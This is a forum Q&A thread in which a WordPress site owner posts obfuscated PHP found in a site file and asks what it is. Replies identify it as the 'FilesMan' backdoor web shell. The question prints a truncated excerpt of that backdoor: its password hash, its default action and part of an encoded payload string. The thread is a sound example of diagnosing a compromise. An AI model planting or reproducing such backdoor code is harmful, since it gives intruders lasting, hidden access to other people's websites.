# Strange code on wordpress website

Tags: php, wordpress

Today I checked my wordpress website and I observed that one php file had the following code in it:

According to [THIS](http://www.unphp.net/decode/0ab3310454272a9d776c468f6f8a5ef8/) it is a encode(eval64)) hack. What`s the meaning of the code below? 
Is this the same as the base encode eval64 hack?

```
<?
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0NDQweHt4NCk0MzMvGR40NDQ0cntmPDB9KSQvMH00KDRnYGZ4cXo8MHl1f3FhZD0vMH0/KSY9NG8ZHjQ0NDQ0NDB4e3g6KXd8Zjx8cWxwcXc8Z2F2Z2BmPDB5dX9xYWQ4MH04Jj09PS8ZHjQ0NDRpGR40NDQ0ZnFgYWZ6NDB4e3gvGR5pGR4wZ3F9d3t4fXp/KWd7eH1wZ2B1YHE8MyYgIyciciMhIyYiJyIhJ3AiJiIlIyciISciJyAhciIgIiEiJyJyIiAiISYsIXUhLCF1IiwiJiAnIiwicSIhInAidyMhIXUicCMsIiwiICAjISEiciEtInAgIiN1IXUhICEtJyQhLCcmISYidyEtJyYnLSJ2IXUhJyIjInEgcSEjIC0jLCByISMhdScgIichICBwIyMiJSJ2ISUnICF1ICcnLScnIicgICEiICAgcCcnISYhJiImJyQnJScgIHEgISBxISYiJiJxIiwhdSEjISAhJiJ1IXUhLCMkICIhdSEjIHUgIyEiICwhdSchISEicSAlJyQiICAsIiMjIyF1JyUgIiEsIHAidyIsIyciJSEgIXUnJSBxISMidickIichIyAtIyIgcSclICYhISEgInUhdSEsISInJiMsInAhICEhISEnJSBxJycgdSclIiAgJyMgInAiJSMtJy0hJCEtISMgcSB2IScnJicsJyEhJiJ2IncgLCImI3UgIiAsIiYjdSJ3IC0hJyEhIicnJSEtInciIyN1IS0nJiMgI3UiICJwInYnJiE......
```

Comment: Seems like attack from Rusian hackers. Before one month i found one of my client injected with these codes in 9 wordpress website. Your codes seems uncompleted.

Comment: There should be a way to inject these codes in your sever, find that injected files and delete it.

Comment: Take the whole string of `$xYEzDu6r3EZT="..."` and decode it online using base64decoder.

Comment: @jogesh_pi it is note completed because i didn`t posted the entire code.

Comment: @user2997779 it's not fully decoded yet. as dan said decode it further you'll get the full code (self tried).

Answer (score 1, accepted):

The code above is of a very common backdoor script called  "FilesMan".  Typically backdoor scripts are written in php. It is quite common for hackers to place a "baskdoor" on a site they have hacked. A backdoor can give a hacker continued access to the site even if the site owners changes account passwords. Backdoor scripts will vary from 100s of lines of code to 1 or 2 lines of code.

For details please visit the site http://aw-snap.info/articles/backdoor-examples.php